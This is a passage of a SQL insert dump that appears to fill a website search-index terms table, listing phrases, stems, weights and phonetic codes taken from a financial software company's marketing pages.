gcc',0,1,1.3333,'I532',1,'en'),(9523,'in the region','in the region',0,1,1.4333,'I53625',1,'en'),(9524,'index management','index management',0,1,1.5333,'I5325253',1,'en'),(9525,'index management fix','index management fix',0,1,1.6667,'I532525312',1,'en'),(9526,'index management information','index management information',0,1,1.9333,'I5325253516535',1,'en'),(9527,'industry specific','industri specific',0,1,1.5667,'I5323621212',1,'en'),(9528,'industry specific solutions','industri specific solutions',0,1,1.9,'I53236212124352',1,'en'),(9529,'information','inform',0,0,0.7333,'I516535',5,'en'),(9530,'information and','inform and',0,1,1.5,'I5165353',1,'en'),(9531,'information and data','inform and data',0,1,1.6667,'I5165353',1,'en'),(9532,'information dissemination','inform dissemination',0,1,1.8333,'I51653532535',2,'en'),(9533,'information dissemination and','inform dissemination and',0,1,1.9667,'I516535325353',1,'en'),(9534,'information dissemination website','inform dissemination website',0,1,2,'I51653532535123',1,'en'),(9535,'information technology','inform technology',0,1,1.7333,'I51653532542',1,'en'),(9536,'information technology fit','inform technology fit',0,1,1.8667,'I5165353254213',1,'en'),(9537,'integration','integr',0,0,0.7333,'I532635',3,'en'),(9538,'integration portals','integr portals',0,1,1.6333,'I53263516342',1,'en'),(9539,'integration portals and','integr portals and',0,1,1.7667,'I5326351634253',1,'en'),(9540,'internet','internet',0,0,0.5333,'I53653',5,'en'),(9541,'internet mobile','internet mobile',0,1,1.5,'I53653514',1,'en'),(9542,'internet mobile trading','internet mobile trading',0,1,1.7667,'I5365351436352',1,'en'),(9543,'investment','invest',0,0,0.6667,'I512353',3,'en'),(9544,'investment applications','invest applications',0,1,1.7667,'I512353142352',1,'en'),(9545,'investment applications mission','invest applications mission',0,1,2,'I512353142352525',1,'en'),(9546,'investment in','invest in',0,1,1.4333,'I5123535',1,'en'),(9547,'investment in both','invest in both',0,1,1.6,'I512353513',1,'en'),(9548,'investment management','invest management',0,1,1.7,'I5123535253',1,'en'),(9549,'investment management solutions','invest management solutions',0,1,2,'I512353525324352',1,'en'),(9550,'investment solutions','invest solutions',0,1,1.6667,'I51235324352',1,'en'),(9551,'investment solutions to','invest solutions to',0,1,1.7667,'I512353243523',1,'en'),(9552,'is a software','is a software',0,1,1.4333,'I2136',1,'en'),(9553,'is working','is working',0,1,1.3333,'I26252',1,'en'),(9554,'is working closely','is working closely',0,1,1.6,'I26252424',1,'en'),(9555,'it has','it has',0,1,1.2,'I320',4,'en'),(9556,'it has to','it has to',0,1,1.3,'I323',1,'en'),(9557,'its','it',1,0,0.025,'I320',11,'en'),(9558,'its valuable','it valuable',0,1,1.4,'I321414',1,'en'),(9559,'its valuable assets','it valuable assets',0,1,1.6333,'I321414232',1,'en'),(9560,'jordan','jordan',0,0,0.4,'J635',2,'en'),(9561,'jordan and','jordan and',0,1,1.3333,'J6353',1,'en'),(9562,'jordan and damascus','jordan and damascus',0,1,1.6333,'J635352',1,'en'),(9563,'jordan partners','jordan partners',0,1,1.5,'J635163562',1,'en'),(9564,'jordan partners in','jordan partners in',0,1,1.6,'J6351635625',1,'en'),(9565,'khartoum','khartoum',0,0,0.5333,'K635',1,'en'),(9566,'khartoum stock','khartoum stock',0,1,1.4667,'K635232',1,'en'),(9567,'khartoum stock exchange','khartoum stock exchange',0,1,1.7667,'K63523252',1,'en'),(9568,'largest','largest',0,0,0.4667,'L623',2,'en'),(9569,'largest portfolio','largest portfolio',0,1,1.5667,'L62316314',1,'en'),(9570,'largest portfolio clients','largest portfolio clients',0,1,1.8333,'L6231631424532',1,'en'),(9571,'leader','leader',0,0,0.4,'L360',2,'en'),(9572,'leader solution','leader solution',0,1,1.5,'L362435',1,'en'),(9573,'leader solution provider','leader solution provider',0,1,1.8,'L36243516136',1,'en'),(9574,'look at','look at',0,1,1.2333,'L230',4,'en'),(9575,'look at information','look at information',0,1,1.6333,'L23516535',1,'en'),(9576,'loosing','loos',0,0,0.4667,'L252',1,'en'),(9577,'loosing the','loos the',0,1,1.3667,'L2523',1,'en'),(9578,'loosing the investment','loos the investment',0,1,1.7333,'L2523512353',1,'en'),(9579,'mainly','mainli',0,0,0.4,'M400',2,'en'),(9580,'mainly investment','mainli investment',0,1,1.5667,'M4512353',1,'en'),(9581,'mainly investment management','mainli investment management',0,1,1.9333,'M45123535253',1,'en'),(9582,'maintained','maintain',0,0,0.6667,'M353',1,'en'),(9583,'maintained and','maintain and',0,1,1.4667,'M35353',1,'en'),(9584,'maintained and fully','maintain and fully',0,1,1.6667,'M3535314',1,'en'),(9585,'management','manag',0,0,0.6667,'M253',8,'en'),(9586,'management fix','manag fix',0,1,1.4667,'M25312',1,'en'),(9587,'management fix protocol','manag fix protocol',0,1,1.7667,'M2531216324',1,'en'),(9588,'management fund','manag fund',0,1,1.5,'M253153',1,'en'),(9589,'management fund management','manag fund management',0,1,1.8667,'M2531535253',1,'en'),(9590,'management index','manag index',0,1,1.5333,'M253532',1,'en'),(9591,'management index management','manag index management',0,1,1.9,'M2535325253',1,'en'),(9592,'management information','manag information',0,1,1.7333,'M253516535',1,'en'),(9593,'management information dissemination','manag information dissemination',0,1,2,'M25351653532535',1,'en'),(9594,'management order','manag order',0,1,1.5333,'M253636',2,'en'),(9595,'management order management','manag order management',0,1,1.9,'M2536365253',1,'en'),(9596,'management portfolio','manag portfolio',0,1,1.6667,'M25316314',1,'en'),(9597,'management portfolio management','manag portfolio management',0,1,2,'M253163145253',1,'en'),(9598,'management research','manag research',0,1,1.6333,'M2536262',1,'en'),(9599,'management research order','manag research order',0,1,1.8333,'M2536262636',1,'en'),(9600,'management solution','manag solution',0,1,1.6333,'M2532435',3,'en'),(9601,'management solution risk','manag solution risk',0,1,1.8,'M253243562',1,'en'),(9602,'management solutions','manag solutions',0,1,1.6667,'M25324352',3,'en'),(9603,'management solutions brokerage','manag solutions brokerage',0,1,2,'M2532435216262',1,'en'),(9604,'management vip','manag vip',0,1,1.4667,'M2531',1,'en'),(9605,'management vip service','manag vip service',0,1,1.7333,'M25312612',1,'en'),(9606,'marker','marker',0,0,0.4,'M626',1,'en'),(9607,'marker website','marker website',0,1,1.4667,'M626123',1,'en'),(9608,'marker website and','marker website and',0,1,1.6,'M62612353',1,'en'),(9609,'market portal','market portal',0,1,1.4333,'M6231634',1,'en'),(9610,'market portal information','market portal information',0,1,1.8333,'M6231634516535',1,'en'),(9611,'markets','market',0,0,0.4667,'M6232',3,'en'),(9612,'markets sector','market sector',0,1,1.4667,'M623236',1,'en'),(9613,'markets sector mainly','market sector mainly',0,1,1.7,'M62323654',1,'en'),(9614,'maximizing','maxim',0,0,0.6667,'M25252',1,'en'),(9615,'maximizing the','maxim the',0,1,1.4667,'M252523',1,'en'),(9616,'maximizing the added','maxim the added',0,1,1.6667,'M252523',1,'en'),(9617,'mind','mind',0,0,0.2667,'M300',1,'en'),(9618,'mind and','mind and',0,1,1.2667,'M353',1,'en'),(9619,'mind and in','mind and in',0,1,1.3667,'M3535',1,'en'),(9620,'mission','mission',0,0,0.4667,'M250',1,'en'),(9621,'mission the','mission the',0,1,1.3667,'M253',1,'en'),(9622,'mission the systems','mission the systems',0,1,1.6333,'M2532352',1,'en'),(9623,'mobile','mobil',0,0,0.4,'M140',4,'en'),(9624,'mobile trading','mobil trading',0,1,1.4667,'M1436352',1,'en'),(9625,'mobile trading risk','mobil trading risk',0,1,1.6333,'M143635262',1,'en'),(9626,'muscat dubai','muscat dubai',0,1,1.4,'M231',1,'en'),(9627,'muscat dubai abu','muscat dubai abu',0,1,1.5333,'M231',1,'en'),(9628,'muscat securities','muscat securities',0,1,1.5667,'M232632',1,'en'),(9629,'muscat securities marker','muscat securities marker',0,1,1.8,'M2326325626',1,'en'),(9630,'nasdaq','nasdaq',0,0,0.4,'N232',1,'en'),(9631,'nasdaq dubai','nasdaq dubai',0,1,1.4,'N23231',1,'en'),(9632,'nasdaq dubai qatar','nasdaq dubai qatar',0,1,1.6,'N23231236',1,'en'),(9633,'needs','need',0,0,0.3333,'N320',3,'en'),(9634,'needs as','need as',0,1,1.2667,'N320',1,'en'),(9635,'needs as well','need as well',0,1,1.4333,'N324',1,'en'),(9636,'of any','of any',0,1,1.2,'O150',2,'en'),(9637,'of any enterprise','of any enterprise',0,1,1.5667,'O1536162',1,'en'),(9638,'of art','of art',0,1,1.2,'O163',1,'en'),(9639,'of art technology','of art technology',0,1,1.5667,'O1632542',1,'en'),(9640,'of functionality','of functionality',0,1,1.5333,'O1523543',1,'en'),(9641,'of functionality in','of functionality in',0,1,1.6333,'O15235435',1,'en'),(9642,'of its','of its',0,1,1.2,'O132',2,'en'),(9643,'of its valuable','of its valuable',0,1,1.5,'O1321414',1,'en'),(9644,'of our','of our',0,1,1.2,'O160',2,'en'),(9645,'of our clients','of our clients',0,1,1.4667,'O1624532',1,'en'),(9646,'of technology','of technology',0,1,1.4333,'O132542',1,'en'),(9647,'of technology partner','of technology partner',0,1,1.7,'O13254216356',1,'en'),(9648,'of the current','of the current',0,1,1.4667,'O132653',1,'en'),(9649,'off','off',1,0,0.025,'O100',13,'en'),(9650,'off by','off by',0,1,1.2,'O100',1,'en'),(9651,'off by providing','off by providing',0,1,1.5333,'O161352',1,'en'),(9652,'offer the','offer the',0,1,1.3,'O163',1,'en'),(9653,'offer the widest','offer the widest',0,1,1.5333,'O16323',1,'en'),(9654,'offices','offic',0,0,0.4667,'O120',1,'en'),(9655,'offices in','offic in',0,1,1.3333,'O125',1,'en'),(9656,'offices in oman','offic in oman',0,1,1.5,'O125',1,'en'),(9657,'oman uae','oman uae',0,1,1.2667,'O500',1,'en'),(9658,'oman uae and','oman uae and',0,1,1.4,'O530',1,'en'),(9659,'on the','on the',0,1,1.2,'O530',13,'en'),(9660,'on the financial','on the financial',0,1,1.5333,'O531524',1,'en'),(9661,'operational','oper',0,0,0.7333,'O16354',1,'en'),(9662,'operational efficiency','oper efficiency',0,1,1.7333,'O163541252',1,'en'),(9663,'operational efficiency of','oper efficiency of',0,1,1.8333,'O1635412521',1,'en'),(9664,'or solution','or solution',0,1,1.3667,'O62435',1,'en'),(9665,'or solution provider','or solution provider',0,1,1.6667,'O6243516136',1,'en'),(9666,'order','order',0,0,0.3333,'O636',7,'en'),(9667,'order management','order management',0,1,1.5333,'O6365253',1,'en'),(9668,'order management index','order management index',0,1,1.7333,'O6365253532',1,'en'),(9669,'order management solution','order management solution',0,1,1.8333,'O63652532435',1,'en'),(9670,'order to','order to',0,1,1.2667,'O6363',2,'en'),(9671,'order to bring','order to bring',0,1,1.4667,'O63631652',1,'en'),(9672,'other','other',1,0,0.0417,'O360',14,'en'),(9673,'other industry','other industry',0,1,1.4667,'O3653236',1,'en'),(9674,'other industry specific','other industry specific',0,1,1.7667,'O365323621212',1,'en'),(9675,'others','other',0,0,0.4,'O362',1,'en'),(9676,'others we','other we',0,1,1.3,'O362',1,'en'),(9677,'others we look','other we look',0,1,1.4667,'O36242',1,'en'),(9678,'our clients having','our clients having',0,1,1.6,'O624532152',1,'en'),(9679,'our clients this','our clients this',0,1,1.5333,'O62453232',1,'en'),(9680,'our mission','our mission',0,1,1.3667,'O6525',1,'en'),(9681,'our mission the','our mission the',0,1,1.5,'O65253',1,'en'),(9682,'our region','our region',0,1,1.3333,'O625',1,'en'),(9683,'our region we','our region we',0,1,1.4333,'O625',1,'en'),(9684,'padding-left','padding-left',0,0,0.8,'P352413',1,'en'),(9685,'padding-left 30px','padding-left 30px',0,1,1.5667,'P35241312',1,'en'),(9686,'padding-left 30px width','padding-left 30px width',0,1,1.7667,'P352413123',1,'en'),(9687,'part of','part of',0,1,1.2333,'P631',6,'en'),(9688,'part of its','part of its',0,1,1.3667,'P63132',1,'en'),(9689,'partner','partner',0,0,0.4667,'P6356',2,'en'),(9690,'partner in','partner in',0,1,1.3333,'P63565',1,'en'),(9691,'partner in delivering','partner in delivering',0,1,1.7,'P63565341652',1,'en'),(9692,'partners in','partner in',0,1,1.3667,'P635625',1,'en'),(9693,'partners in saudi','partner in saudi',0,1,1.5667,'P63562523',1,'en'),(9694,'portal','portal',0,0,0.4,'P634',1,'en'),(9695,'portal information','portal information',0,1,1.6,'P634516535',1,'en'),(9696,'portal information dissemination','portal information dissemination',0,1,2,'P63451653532535',1,'en'),(9697,'portals','portal',0,0,0.4667,'P6342',1,'en'),(9698,'portals and','portal and',0,1,1.3667,'P634253',1,'en'),(9699,'portals and internet','portal and internet',0,1,1.6667,'P63425353653',1,'en'),(9700,'portfolio','portfolio',0,0,0.6,'P6314',3,'en'),(9701,'portfolio clients','portfolio clients',0,1,1.5667,'P631424532',1,'en'),(9702,'portfolio clients based','portfolio clients based',0,1,1.7667,'P631424532123',1,'en'),(9703,'portfolio management','portfolio management',0,1,1.6667,'P63145253',3,'en'),(9704,'portfolio management fund','portfolio management fund',0,1,1.8333,'P63145253153',1,'en'),(9705,'portfolio management order','portfolio management order',0,1,1.8667,'P63145253636',1,'en'),(9706,'preserved','preserv',0,0,0.6,'P62613',1,'en'),(9707,'preserved maintained','preserv maintained',0,1,1.6667,'P626135353',1,'en'),(9708,'preserved maintained and','preserv maintained and',0,1,1.8,'P62613535353',1,'en'),(9709,'products','product',0,0,0.5333,'P63232',4,'en'),(9710,'products markets','product markets',0,1,1.5333,'P6323256232',1,'en'),(9711,'products markets sector','product markets sector',0,1,1.7667,'P632325623236',1,'en'),(9712,'protocol','protocol',0,0,0.5333,'P6324',1,'en'),(9713,'protocol stp','protocol stp',0,1,1.4,'P6324231',1,'en'),(9714,'provide','provid',0,0,0.4667,'P613',3,'en'),(9715,'provide better','provid better',0,1,1.4667,'P613136',1,'en'),(9716,'provide better services','provid better services',0,1,1.7667,'P6131362612',1,'en'),(9717,'provided by','provid by',0,1,1.3667,'P6131',2,'en'),(9718,'provided by fit','provid by fit',0,1,1.5,'P61313',1,'en'),(9719,'provider','provid',0,0,0.5333,'P6136',1,'en'),(9720,'provider based','provid based',0,1,1.4667,'P6136123',1,'en'),(9721,'provider based in','provid based in',0,1,1.5667,'P61361235',1,'en'),(9722,'provider hits','provid hits',0,1,1.4333,'P613632',1,'en'),(9723,'provider hits the','provid hits the',0,1,1.5667,'P6136323',1,'en'),(9724,'provider in','provid in',0,1,1.3667,'P61365',1,'en'),(9725,'provider in the','provid in the',0,1,1.5,'P613653',1,'en'),(9726,'provider such','provid such',0,1,1.4333,'P61362',1,'en'),(9727,'provider such as','provid such as',0,1,1.5333,'P61362',1,'en'),(9728,'providing investment','provid investment',0,1,1.6667,'P61352512353',1,'en'),(9729,'providing investment solutions','provid investment solutions',0,1,2,'P6135251235324352',1,'en'),(9730,'qatar','qatar',0,0,0.3333,'Q360',2,'en'),(9731,'qatar egypt','qatar egypt',0,1,1.3667,'Q36213',1,'en'),(9732,'qatar egypt and','qatar egypt and',0,1,1.5,'Q3621353',1,'en'),(9733,'qatar jordan','qatar jordan',0,1,1.4,'Q362635',1,'en'),(9734,'qatar jordan and','qatar jordan and',0,1,1.5333,'Q3626353',1,'en'),(9735,'region','region',0,0,0.4,'R250',2,'en'),(9736,'region has','region has',0,1,1.3333,'R252',1,'en'),(9737,'region has the','region has the',0,1,1.4667,'R2523',1,'en'),(9738,'region the','region the',0,1,1.3333,'R253',1,'en'),(9739,'region the functionality','region the functionality',0,1,1.8,'R2531523543',1,'en'),(9740,'region we','region we',0,1,1.3,'R250',1,'en'),(9741,'region we established','region we established',0,1,1.7,'R25231423',1,'en'),(9742,'regional','region',0,0,0.5333,'R254',1,'en'),(9743,'regional selected','region selected',0,1,1.5667,'R2542423',1,'en'),(9744,'regional selected choice','region selected choice',0,1,1.8,'R25424232',1,'en'),(9745,'regional stock','region stock',0,1,1.4667,'R254232',1,'en'),(9746,'regional stock exchanges','region stock exchanges',0,1,1.8,'R25423252',1,'en'),(9747,'requirements','requir',0,0,0.8,'R26532',1,'en'),(9748,'requirements without','requir without',0,1,1.6667,'R265323',1,'en'),(9749,'requirements without loosing','requir without loosing',0,1,1.9333,'R2653234252',1,'en'),(9750,'research','research',0,0,0.5333,'R262',3,'en'),(9751,'research order','research order',0,1,1.4667,'R262636',1,'en'),(9752,'research order management','research order management',0,1,1.8333,'R2626365253',1,'en'),(9753,'risk','risk',0,0,0.2667,'R200',1,'en'),(9754,'risk management','risk management',0,1,1.5,'R25253',1,'en'),(9755,'risk management index','risk management index',0,1,1.7,'R25253532',1,'en'),(9756,'risk management vip','risk management vip',0,1,1.6333,'R252531',1,'en'),(9757,'saudi','saudi',0,0,0.3333,'S300',1,'en'),(9758,'saudi arabia','saudi arabia',0,1,1.4,'S361',1,'en'),(9759,'saudi arabia qatar','saudi arabia qatar',0,1,1.6,'S361236',1,'en'),(9760,'sector','sector',0,0,0.4,'S360',1,'en'),(9761,'sector mainly','sector mainly',0,1,1.4333,'S3654',1,'en'),(9762,'sector mainly investment','sector mainly investment',0,1,1.8,'S3654512353',1,'en'),(9763,'securities','secur',0,0,0.6667,'S632',3,'en'),(9764,'securities marker','secur marker',0,1,1.5667,'S6325626',1,'en'),(9765,'securities marker website','secur marker website',0,1,1.8333,'S6325626123',1,'en'),(9766,'selected','select',0,0,0.5333,'S423',4,'en'),(9767,'selected choice','select choice',0,1,1.5,'S4232',1,'en'),(9768,'selected choice of','select choice of',0,1,1.6,'S42321',1,'en'),(9769,'served','serv',0,0,0.4,'S613',2,'en'),(9770,'served as','serv as',0,1,1.3,'S6132',1,'en'),(9771,'served as a','serv as a',0,1,1.3667,'S6132',1,'en'),(9772,'service','servic',0,0,0.4667,'S612',7,'en'),(9773,'service centre','servic centre',0,1,1.4667,'S612536',1,'en'),(9774,'service centre fit','servic centre fit',0,1,1.6,'S61253613',1,'en'),(9775,'services products','servic products',0,1,1.5667,'S612163232',1,'en'),(9776,'services products markets','servic products markets',0,1,1.8333,'S61216323256232',1,'en'),(9777,'services to','servic to',0,1,1.3667,'S6123',2,'en'),(9778,'services to enhance','servic to enhance',0,1,1.6333,'S612352',1,'en'),(9779,'so','so',1,0,0.0167,'S000',12,'en'),(9780,'so it','so it',0,1,1.1667,'S300',2,'en'),(9781,'so it has','so it has',0,1,1.3,'S320',1,'en'),(9782,'software applications','softwar applications',0,1,1.7,'S136142352',1,'en'),(9783,'software applications that','softwar applications that',0,1,1.8667,'S1361423523',1,'en'),(9784,'software solutions provider','softwar solutions provider',0,1,1.9,'S1362435216136',1,'en'),(9785,'solution','solut',0,0,0.5333,'S435',8,'en'),(9786,'solution provider','solut provider',0,1,1.5667,'S43516136',1,'en'),(9787,'solution provider in','solut provider in',0,1,1.6667,'S435161365',1,'en'),(9788,'solution provider such','solut provider such',0,1,1.7333,'S435161362',1,'en'),(9789,'solution risk','solut risk',0,1,1.4333,'S43562',1,'en'),(9790,'solution risk management','solut risk management',0,1,1.8,'S435625253',1,'en'),(9791,'solutions brokerage','solut brokerage',0,1,1.6333,'S435216262',1,'en'),(9792,'solutions brokerage fund','solut brokerage fund',0,1,1.8,'S435216262153',1,'en'),(9793,'solutions fit','solut fit',0,1,1.4333,'S435213',1,'en'),(9794,'solutions fit as','solut fit as',0,1,1.5333,'S4352132',1,'en'),(9795,'solutions provided','solut provided',0,1,1.6,'S43521613',1,'en'),(9796,'solutions provided by','solut provided by',0,1,1.7,'S435216131',1,'en'),(9797,'solutions provider','solut provider',0,1,1.6,'S435216136',1,'en'),(9798,'solutions provider based','solut provider based',0,1,1.8,'S435216136123',1,'en'),(9799,'solutions to','solut to',0,1,1.4,'S43523',1,'en'),(9800,'solutions to the','solut to the',0,1,1.5333,'S43523',1,'en'),(9801,'specific','specif',0,0,0.5333,'S1212',1,'en'),(9802,'specific solutions','specif solutions',0,1,1.6,'S12124352',1,'en'),(9803,'specific solutions fit','specif solutions fit',0,1,1.7333,'S1212435213',1,'en'),(9804,'state of','state of',0,1,1.2667,'S310',2,'en'),(9805,'state of art','state of art',0,1,1.4,'S3163',1,'en'),(9806,'statement','statement',0,0,0.6,'S353',1,'en'),(9807,'statement served','statement served',0,1,1.5333,'S3532613',1,'en'),(9808,'statement served as','statement served as',0,1,1.6333,'S35326132',1,'en'),(9809,'stock','stock',0,0,0.3333,'S320',3,'en'),(9810,'stock exchange','stock exchange',0,1,1.4667,'S3252',1,'en'),(9811,'stock exchange trading','stock exchange trading',0,1,1.7333,'S325236352',1,'en'),(9812,'stock exchanges','stock exchanges',0,1,1.5,'S3252',1,'en'),(9813,'stock exchanges either','stock exchanges either',0,1,1.7333,'S325236',1,'en'),(9814,'stock exchanges the','stock exchanges the',0,1,1.6333,'S32523',1,'en'),(9815,'stp','stp',0,0,0.2,'S310',1,'en'),(9816,'such','such',0,0,0.2667,'S000',4,'en'),(9817,'such as','such as',0,1,1.2333,'S000',3,'en'),(9818,'such as dubai','such as dubai',0,1,1.4333,'S310',1,'en'),(9819,'syria','syria',0,0,0.3333,'S600',1,'en'),(9820,'syria focused','syria focused',0,1,1.4333,'S6123',1,'en'),(9821,'syria focused on','syria focused on',0,1,1.5333,'S61235',1,'en'),(9822,'systems','system',0,0,0.4667,'S352',2,'en'),(9823,'systems and','system and',0,1,1.3667,'S35253',1,'en'),(9824,'systems and software','system and software',0,1,1.6667,'S352532136',1,'en'),(9825,'take','take',0,0,0.2667,'T200',8,'en'),(9826,'take care','take care',0,1,1.3,'T260',1,'en'),(9827,'take care of','take care of',0,1,1.4,'T261',1,'en'),(9828,'taken','taken',0,0,0.3333,'T250',5,'en'),(9829,'taken care','taken care',0,1,1.3333,'T2526',1,'en'),(9830,'taken care off','taken care off',0,1,1.4667,'T25261',1,'en'),(9831,'technology','technolog',0,0,0.6667,'T2542',2,'en'),(9832,'technology fit','technolog fit',0,1,1.4667,'T254213',1,'en'),(9833,'technology fit is','technolog fit is',0,1,1.5667,'T2542132',1,'en'),(9834,'technology fit to','technolog fit to',0,1,1.5667,'T254213',1,'en'),(9835,'technology partner','technolog partner',0,1,1.6,'T254216356',1,'en'),(9836,'technology partner in','technolog partner in',0,1,1.7,'T2542163565',1,'en'),(9837,'technology to','technolog to',0,1,1.4333,'T25423',1,'en'),(9838,'technology to our','technolog to our',0,1,1.5667,'T254236',1,'en'),(9839,'that','that',1,0,0.0333,'T000',15,'en'),(9840,'that we','that we',0,1,1.2333,'T000',3,'en'),(9841,'that we developed','that we developed',0,1,1.5667,'T1413',1,'en'),(9842,'the added','the added',0,1,1.3,'T000',1,'en'),(9843,'the added value','the added value',0,1,1.5,'T140',1,'en'),(9844,'the core','the core',0,1,1.2667,'T260',1,'en'),(9845,'the core solutions','the core solutions',0,1,1.6,'T2624352',1,'en'),(9846,'the current','the current',0,1,1.3667,'T2653',1,'en'),(9847,'the current needs','the current needs',0,1,1.5667,'T2653532',1,'en'),(9848,'the enterprise','the enterprise',0,1,1.4667,'T536162',1,'en'),(9849,'the enterprise we','the enterprise we',0,1,1.5667,'T536162',1,'en'),(9850,'the financial','the financial',0,1,1.4333,'T1524',1,'en'),(9851,'the financial services','the financial services',0,1,1.7333,'T15242612',1,'en'),(9852,'the first','the first',0,1,1.3,'T1623',3,'en'),(9853,'the first information','the first information',0,1,1.7,'T1623516535',1,'en'),(9854,'the first provider','the first provider',0,1,1.6,'T162316136',1,'en'),(9855,'the following','the following',0,1,1.4333,'T1452',3,'en'),(9856,'the following brokerage','the following brokerage',0,1,1.7667,'T145216262',1,'en'),(9857,'the functionality','the functionality',0,1,1.5667,'T1523543',1,'en'),(9858,'the functionality encompasses','the functionality encompasses',0,1,1.9667,'T152354352512',1,'en'),(9859,'the future','the future',0,1,1.3333,'T136',2,'en'),(9860,'the future expansions','the future expansions',0,1,1.7,'T136215252',1,'en'),(9861,'the gcc','the gcc',0,1,1.2333,'T200',1,'en'),(9862,'the gcc fit','the gcc fit',0,1,1.3667,'T213',1,'en'),(9863,'the gcc with','the gcc with',0,1,1.4,'T230',1,'en'),(9864,'the investment','the investment',0,1,1.4667,'T512353',1,'en'),(9865,'the investment in','the investment in',0,1,1.5667,'T5123535',1,'en'),(9866,'the largest','the largest',0,1,1.3667,'T4623',1,'en'),(9867,'the largest portfolio','the largest portfolio',0,1,1.7,'T462316314',1,'en'),(9868,'the operational','the operational',0,1,1.5,'T16354',1,'en'),(9869,'the operational efficiency','the operational efficiency',0,1,1.8667,'T163541252',1,'en'),(9870,'the region','the region',0,1,1.3333,'T625',1,'en'),(9871,'the region has','the region has',0,1,1.4667,'T6252',1,'en'),(9872,'the region the','the region the',0,1,1.4667,'T6253',1,'en'),(9873,'the regional','the regional',0,1,1.4,'T6254',1,'en'),(9874,'the regional selected','the regional selected',0,1,1.7,'T62542423',1,'en'),(9875,'the regional stock','the regional stock',0,1,1.6,'T6254232',1,'en'),(9876,'the state','the state',0,1,1.3,'T230',2,'en'),(9877,'the state of','the state of',0,1,1.4,'T231',1,'en'),(9878,'the systems','the systems',0,1,1.3667,'T2352',1,'en'),(9879,'the systems and','the systems and',0,1,1.5,'T235253',1,'en'),(9880,'the trading','the trading',0,1,1.3667,'T6352',1,'en'),(9881,'the trading engine','the trading engine',0,1,1.6,'T6352525',1,'en'),(9882,'the widest','the widest',0,1,1.3333,'T230',1,'en'),(9883,'the widest breadth','the widest breadth',0,1,1.6,'T23163',1,'en'),(9884,'this','thi',1,0,0.0333,'T200',17,'en'),(9885,'this in','thi in',0,1,1.2333,'T250',1,'en'),(9886,'this in mind','thi in mind',0,1,1.4,'T253',1,'en'),(9887,'this statement','thi statement',0,1,1.4667,'T2353',1,'en'),(9888,'this statement served','thi statement served',0,1,1.7,'T23532613',1,'en'),(9889,'those','those',1,0,0.0417,'T200',6,'en'),(9890,'those goals','those goals',0,1,1.3667,'T242',1,'en'),(9891,'those goals among','those goals among',0,1,1.5667,'T24252',1,'en'),(9892,'to achieve','to achieve',0,1,1.3333,'T210',1,'en'),(9893,'to achieve those','to achieve those',0,1,1.5333,'T2132',1,'en'),(9894,'to be','to be',0,1,1.1667,'T100',11,'en'),(9895,'to be preserved','to be preserved',0,1,1.5,'T162613',1,'en'),(9896,'to bring','to bring',0,1,1.2667,'T1652',2,'en'),(9897,'to bring the','to bring the',0,1,1.4,'T16523',1,'en'),(9898,'to enhance','to enhance',0,1,1.3333,'T520',1,'en'),(9899,'to enhance the','to enhance the',0,1,1.4667,'T523',1,'en'),(9900,'to our region','to our region',0,1,1.4333,'T625',1,'en'),(9901,'to the','to the',0,1,1.2,'T000',15,'en'),(9902,'to the enterprise','to the enterprise',0,1,1.5667,'T536162',1,'en'),(9903,'trading','trade',0,0,0.4667,'T6352',6,'en'),(9904,'trading engine','trade engine',0,1,1.4667,'T6352525',1,'en'),(9905,'trading engine for','trade engine for',0,1,1.6,'T635252516',1,'en'),(9906,'trading engine vision','trade engine vision',0,1,1.7,'T6352525125',1,'en'),(9907,'trading risk','trade risk',0,1,1.4,'T635262',1,'en'),(9908,'trading risk management','trade risk management',0,1,1.7667,'T6352625253',1,'en'),(9909,'uae and','uae and',0,1,1.2333,'U530',1,'en'),(9910,'uae and jordan','uae and jordan',0,1,1.4667,'U532635',1,'en'),(9911,'valuable','valuabl',0,0,0.5333,'V414',2,'en'),(9912,'valuable assets','valuabl assets',0,1,1.5,'V414232',1,'en'),(9913,'valuable assets so','valuabl assets so',0,1,1.6,'V414232',1,'en'),(9914,'value','valu',0,0,0.3333,'V400',3,'en'),(9915,'value we','valu we',0,1,1.2667,'V400',1,'en'),(9916,'value we deliver','valu we deliver',0,1,1.5333,'V43416',1,'en'),(9917,'vip','vip',0,0,0.2,'V000',1,'en'),(9918,'vip service','vip service',0,1,1.3667,'V2612',1,'en'),(9919,'vip service centre','vip service centre',0,1,1.6,'V2612536',1,'en'),(9920,'vision','vision',0,0,0.4,'V250',1,'en'),(9921,'vision be','vision be',0,1,1.3,'V251',1,'en'),(9922,'vision be the','vision be the',0,1,1.4333,'V2513',1,'en'),(9923,'was','wa',1,0,0.025,'W200',15,'en'),(9924,'was the','wa the',0,1,1.2333,'W230',3,'en'),(9925,'was the first','wa the first',0,1,1.4333,'W231623',1,'en'),(9926,'we believe','we believe',0,1,1.3333,'W141',1,'en'),(9927,'we believe we','we believe we',0,1,1.4333,'W141',1,'en'),(9928,'we deliver','we deliver',0,1,1.3333,'W3416',1,'en'),(9929,'we deliver to','we deliver to',0,1,1.4333,'W34163',1,'en'),(9930,'we developed','we developed',0,1,1.4,'W31413',1,'en'),(9931,'we developed take','we developed take',0,1,1.5667,'W314132',1,'en'),(9932,'we established','we established',0,1,1.4667,'W231423',1,'en'),(9933,'we established the','we established the',0,1,1.6,'W231423',1,'en'),(9934,'we look at','we look at',0,1,1.3333,'W423',1,'en'),(9935,'we will','we will',0,1,1.2333,'W400',1,'en'),(9936,'we will accomplish','we will accomplish',0,1,1.6,'W425142',1,'en'),(9937,'website and','websit and',0,1,1.3667,'W12353',1,'en'),(9938,'website and khartoum','websit and khartoum',0,1,1.6667,'W123532635',1,'en'),(9939,'website muscat','websit muscat',0,1,1.4667,'W123523',1,'en'),(9940,'website muscat securities','websit muscat securities',0,1,1.8333,'W1235232632',1,'en'),(9941,'well as','well as',0,1,1.2333,'W420',4,'en'),(9942,'well as the','well as the',0,1,1.3667,'W423',2,'en'),(9943,'widest','widest',0,0,0.4,'W323',1,'en'),(9944,'widest breadth','widest breadth',0,1,1.4667,'W323163',1,'en'),(9945,'widest breadth of','widest breadth of',0,1,1.5667,'W3231631',1,'en'),(9946,'width','width',0,0,0.3333,'W300',1,'en'),(9947,'width 1343pt','width 1343pt',0,1,1.4,'W313',1,'en'),(9948,'width 1343pt padding-left','width 1343pt padding-left',0,1,1.8333,'W3131352413',1,'en'),(9949,'width 1790','width 1790',0,1,1.3333,'W300',1,'en'),(9950,'width 1790 height','width 1790 height',0,1,1.5667,'W323',1,'en'),(9951,'will','will',1,0,0.0333,'W400',17,'en'),(9952,'will accomplish','will 